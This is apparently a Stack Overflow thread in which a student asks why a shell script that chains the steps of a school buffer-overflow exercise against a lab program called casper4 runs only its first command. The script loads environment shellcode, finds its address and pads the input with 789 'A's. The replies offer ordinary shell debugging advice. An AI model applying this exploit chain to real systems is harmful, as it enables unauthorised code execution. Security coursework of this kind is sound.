0

I'm writing a buffer overflow exploit for a school project. The program I'm trying to exploit is called casper4. I know how to exploit the program but now I'm trying to put the sequence of commands into one shell script.

My script looks like this:

#!/bin/sh
./egg1; # Put the shell code in the enviromnent
./eggfind > output.txt; # Put the address of the shellcode in output.txt
./escapeAddr "$(<output.txt)" > addressHexa.txt # Escape the address
echo -e "$(<addressHexa.txt)" > address.txt; # Address to ascii
perl -e 'print "A"x789' > As.txt; # Get As to fill the buffer
cat As.txt address.txt > input.txt; # Create one input file
./casper4 "$(<input.txt)"; # Feed the input to the program

I don't think it's important to know what each script/program does. The problem is that whenever I run this script it only seems to execute ./egg1 instead of all the commands in sequence.

It produces the correct result when I enter each of these lines separately into my command-line.

How can I let this script achieve the same result as entering each of these lines one for one into the command-line?

Thomas Vanhelden
  • 879
  • 8
  • 20
  • 1
    this probably because calling `egg1` makes the script hang. If you have a set of commands, they are being executed one after the other: once one is done, the next one takes over. – fedorqui Dec 08 '15 at 12:08
  • There is also a chance that the `./egg1` changes the working directory. – sjsam Dec 08 '15 at 12:16
  • 2
    You should trace the execution (`set -x`) to see what's going on. – user1934428 Dec 08 '15 at 12:23
  • @fedorqui `egg1` executes successfully. I think so because the script prints "Eggshell loaded into environment." and I can run `eggfind` afterwards to get the address. – Thomas Vanhelden Dec 08 '15 at 12:38
  • 1
    Literally no way of know what is wrong without seeing what all the scripts do. Any attempt to help will be pure speculation. – 123 Dec 08 '15 at 14:50
  • Yes, you're right. Problem was with one of the scripts. I voted to close the question. Sorry. – Thomas Vanhelden Dec 08 '15 at 15:04

2 Answers2

1

More then likely one of the commands is not exiting and this is holding up the whole sequence. The best option is to add timeouts to your code to help in debugging.

I would suggest this article on coding in shell defensively: Robust shell scripts

Including a timeout in your script: Timeout a command in bash

Community
  • 1
  • 1
Thomas Vincent
  • 248
  • 2
  • 12
  • Do I need to? All I'm really trying to do is put these lines, that work when entering them one for one into the command-line, into a script. Shouldn't it be really simple? – Thomas Vanhelden Dec 08 '15 at 12:45
  • @ThomasVanhelden Sorry for being blunt, but I don't believe you when you say that the script has the same commands you type. For example, the script has a lot of useless semicolons which I don't think you typed. Please provide us with proof that the commands work when typed. One such proof would be a typescript created with `script` followed by the commands. – Jens Dec 08 '15 at 15:04
  • @Jens No problem, I deserve it. The problem is not in the script I posted, it turned out to be a problem in the `egg1` script. `egg1` opened a bash shell so all the other commands in the script I posted were processed by that shell instead of in the original. I therefore voted to close my question since it's a really bad one. – Thomas Vanhelden Dec 08 '15 at 15:11
1

You could pipeline the commands by using ./egg1 | ./eggfind | ... The ... meaning the rest of your commands. Just separate them by |.

Josh Tree
  • 23
  • 4
  • I tried that but it doesn't provide the required result. It does execute `casper4' (the last command) but it calls it with empty output. All files created in the script are empty. – Thomas Vanhelden Dec 08 '15 at 14:45